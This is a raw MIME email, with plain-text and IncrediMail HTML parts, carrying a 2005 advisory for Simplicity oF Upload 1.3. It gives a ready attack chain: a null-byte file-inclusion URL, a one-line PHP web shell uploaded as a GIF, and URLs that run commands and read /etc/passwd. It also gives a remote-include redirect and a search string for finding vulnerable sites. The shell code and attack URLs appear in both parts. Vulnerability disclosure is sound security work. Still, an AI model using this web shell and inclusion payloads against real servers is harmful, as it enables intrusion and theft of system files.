--------------Boundary-00=_B6O8YHI1VA4000000000 Content-Type: Text/Plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 26/07/2005 16.09.18=0D =0D Simplicity OF Upload 1.3 (possibly prior versons) remote code execution =0D & cross site scripting=0D =0D software: =0D author site: http://www.phpsimplicity.com/scripts.php?id=3D3=0D =0D =0D remote commands execution:=0D =0D problem at line 25-30: =0D =2E..=0D //check for language overriding..=0D if (isset($_GET['language']))=0D $language =3D strtolower($_GET['language']);=0D =0D //now we include the language file=0D require_once("$language.lng");=0D =2E..=0D =0D you can include whatever adding a null byte to "language" parameter value= :=0D =0D example:=0D http://localhost:30/simply/download.php?language=3Dupload.php%00=0D =0D you will see upload & download page together :)=0D =0D so you can upload a cmd.gif (when you upload a .php file, usually it is=0D renamed to .html...) file with this php code inside to execute=0D commands:=0D =0D <?php=0D =0D system($HTTP_GET_VARS[command]);=0D =0D ?>=0D =0D then try this url:=0D =0D http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dls=0D =0D to list directories=0D =0D http://[target]/[path]/download.php?language=3Dcmd gif%00&command=3Dcat%20/etc/passwd=0D =0D to show /etc/passwd file=0D =0D cross site scripting:=0D =0D also, a remote user can supply a specially crafted URL to redirect other people=0D to an evil page:=0D =0D http://[target]/[path]/download php?language=3Dhttp://[evil_site]/[evil_page]%00=0D =0D =0D =0D googledork:=0D =0D "Powered By: Simplicity oF Upload"=0D =0D =0D rgod=0D email: rgod[at]autistici.org=0D site: http://rgod.altervista.org=0D original advisory: http://rgod.altervista.org/simply.html --------------Boundary-00=_B6O8YHI1VA4000000000 Content-Type: Text/HTML; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-= 1"> <META content=3D"IncrediMail 1.0" name=3DGENERATOR> <!--IncrdiXMLRemarkStart> <IncrdiX-Info> <X-FID>FLAVOR00-NONE-0000-0000-000000000000</X-FID> <X-FVER>4.0</X-FVER> <X-CNT>;</X-CNT> </IncrdiX-Info> <IncrdiXMLRemarkEnd--> </HEAD> <BODY style=3D"BACKGROUND-POSITION: 0px 0px; FONT-SIZE: 12pt; MARGIN: 5px= 10px 10px; FONT-FAMILY: Arial" bgColor=3D#ffffff background=3D"" scroll=3D= yes ORGYPOS=3D"0"> <TABLE id=3DINCREDIMAINTABLE cellSpacing=3D0 cellPadding=3D2 width=3D"100= %" border=3D0> <TBODY> <TR> <TD id=3DINCREDITEXTREGION style=3D"FONT-SIZE: 12pt; CURSOR: auto; FONT-F= AMILY: Arial" width=3D"100%"><PRE><CODE><SPAN style=3D"FONT: 10pt Courier= New"><SPAN class=3Dgeneral1-number>26/07/2005 16.09.18 Simplicity OF Upload 1.3 (possibly prior versons) remote code execution=20 & cross site scripting software:=20 author site: http://www.phpsimplicity.com/scripts.php?id=3D3 remote commands execution: problem at line 25-30:=20 =2E.. //check for language overriding.. if (isset($_GET['language'])) $language =3D strtolower($_GET['language']); //now we include the language file require_once("$language.lng"); =2E.. you can include whatever adding a null byte to "language" parameter value= : example: http://localhost:30/simply/download.php?language=3Dupload.php%00 you will see upload & download page together :) so you can upload a cmd.gif (when you upload a .php file, usually it is renamed to .html...) file with this php code inside to execute commands: <?php system($HTTP_GET_VARS[command]); ?> then try this url: http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dl= s to list directories http://[target]/[path]/download.php?language=3Dcmd.gif%00&command=3Dc= at%20/etc/passwd to show /etc/passwd file cross site scripting: also, a remote user can supply a specially crafted URL to redirect other = people to an evil page: http://[target]/[path]/download.php?language=3Dhttp://[evil_site]/[evil_p= age]%00 googledork: "Powered By: Simplicity oF Upload" rgod email: rgod[at]autistici.org site: <A href=3D"http://rgod.altervista.orgoriginal">http://rgod.altervis= ta.org </SPAN></SPAN>original</A> advisory: <A href=3D"http://rgod.altervista.or= g/simply.html">http://rgod.altervista.org/simply.html</A> </CODE></PRE></TD></TR> <TR> <TD id=3DINCREDIFOOTER width=3D"100%"> <TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%"> <TBODY> <TR> <TD width=3D"100%"></TD> <TD id=3DINCREDISOUND vAlign=3Dbottom align=3Dmiddle></TD> <TD id=3DINCREDIANIM vAlign=3Dbottom align=3Dmiddle></TD></TR></TBODY></T= ABLE></TD></TR></TBODY></TABLE><SPAN id=3DIncrediStamp><SPAN dir=3Dltr><A= title=3D"Add FUN to your email - CLICK HERE!" style=3D"TEXT-DECORATION: = none" href=3D"http://www.incredimail.com/index.asp?id=3D96322"><FONT styl= e=3D"COLOR: black" face=3D"Arial, Helvetica, sans-serif" size=3D2>_______= ______________________________________________________________<BR> <= B>FREE Emoticons for your email! </FONT><FONT face=3D"Arial, Helvetica, s= ans-serif" size=3D2><U>Click Here!</U></B> &= nbsp; &n= bsp; &nb= sp; </FONT><BR= ><IMG hspace=3D0 src=3D"http://www2.incredimail.com/contents/stamps/imstp= _7_05_10.gif" align=3Dbaseline border=3D0></A></SPAN></SPAN></BODY></HTML= > --------------Boundary-00=_B6O8YHI1VA4000000000--